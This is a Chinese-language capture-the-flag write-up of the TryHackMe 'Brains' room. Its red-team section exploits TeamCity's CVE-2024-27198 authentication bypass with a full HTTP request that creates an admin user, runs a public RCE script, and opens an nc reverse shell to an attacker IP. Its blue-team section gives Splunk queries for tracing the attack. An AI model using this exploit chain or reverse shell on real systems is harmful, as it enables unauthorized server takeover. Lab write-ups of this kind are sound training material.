TryhackMe Brains靶场:
文章目录

房间介绍
欢迎来到 Brains 挑战赛,这是 TryHackMe 黑客马拉松的一部分!
所有大脑聚集在一起,打造一个工程奇迹;然而,似乎有陌生人找到了进入。
首先部署计算机;单击 此任务右上角的 按钮,为该房间部署虚拟机。Start Machine
注意:请等待机器 4 - 6 分钟以完全启动。
红队:利用服务器!
信息收集
端口扫描发现存在22,80,50000端口
查看80端口网页发现,网站维护,目录扫描啥也没扫到
查看一下50000端口发现是Teamcity版本是2023.11.3的版本
JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198
通过查找找到历史漏洞JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198
这边我们选择使用BurpSuite手动发包
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: your-ip:8111
x-teamcity-client: Web UI
x-requested-with: XMLHttpRequest
Referer: http://your-ip:8111/profile.html
x-tc-csrf-token: a1f58037-7d9e-4934-9243-089e213c15e2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
Content-Length: 161
{
"username": "user1",
"password": "user1",
"email": "userthr331@npc.com",
"roles": { "role": [{ "roleId": "SYSTEM_ADMIN", "scope": "g" }] }
}
使用我们创建的用户登录user1:user1
但是我发现我不知道怎么RCE,去网上找找RCE的,有没有RCE的案例,
这是我找到的RCE的脚本,如果你和小T一样使用tryhackme的攻击机请使用python3
pip3 install requests urllib3 faker
/usr/bin/python3 -m pip install --upgrade pip
python3 CVE-2024-27198-RCE.py -t http://10.10.101.109:50000
拿到shell之后可以发现shell不稳定,反弹一个shell
提前使用nc监听
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.172.133 6677 >/tmp/f
使用python3稳定shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
获取flag.txt
到用户目录拿flag.txt
最后的图片就不放了因为小T又崩了
cd /
cd home
cd ubuntu
cat flag.txt
蓝队:让我们调查
房间介绍
现在是检测部分。
IT 部门为我们提供了其中一台服务器,该服务器因攻击而受损。作为取证分析师,我们的任务是检查主机并识别攻击者在漏洞利用后阶段的足迹。
实验室连接
在继续之前,请部署计算机。部署计算机时,将为其分配一个 IP 地址:。Splunk 实例将在大约 5 分钟内访问,并且可以使用以下凭据进行访问:10.10.89.139``10.10.89.139:8000
用户名:splunk
密码:analyst12
被利用后在服务器上创建的后门用户名称是什么?
source=“/var/log/auth.log” useradd
服务器上安装的具有恶意的软件包的名称是什么?
source=“/var/log/dpkg.log” date_month=“july” date_mday=“4” install
成功利用后,服务器上安装的插件名称是什么?
source=“/opt/teamcity/TeamCity/logs/teamcity-activities.log” plugin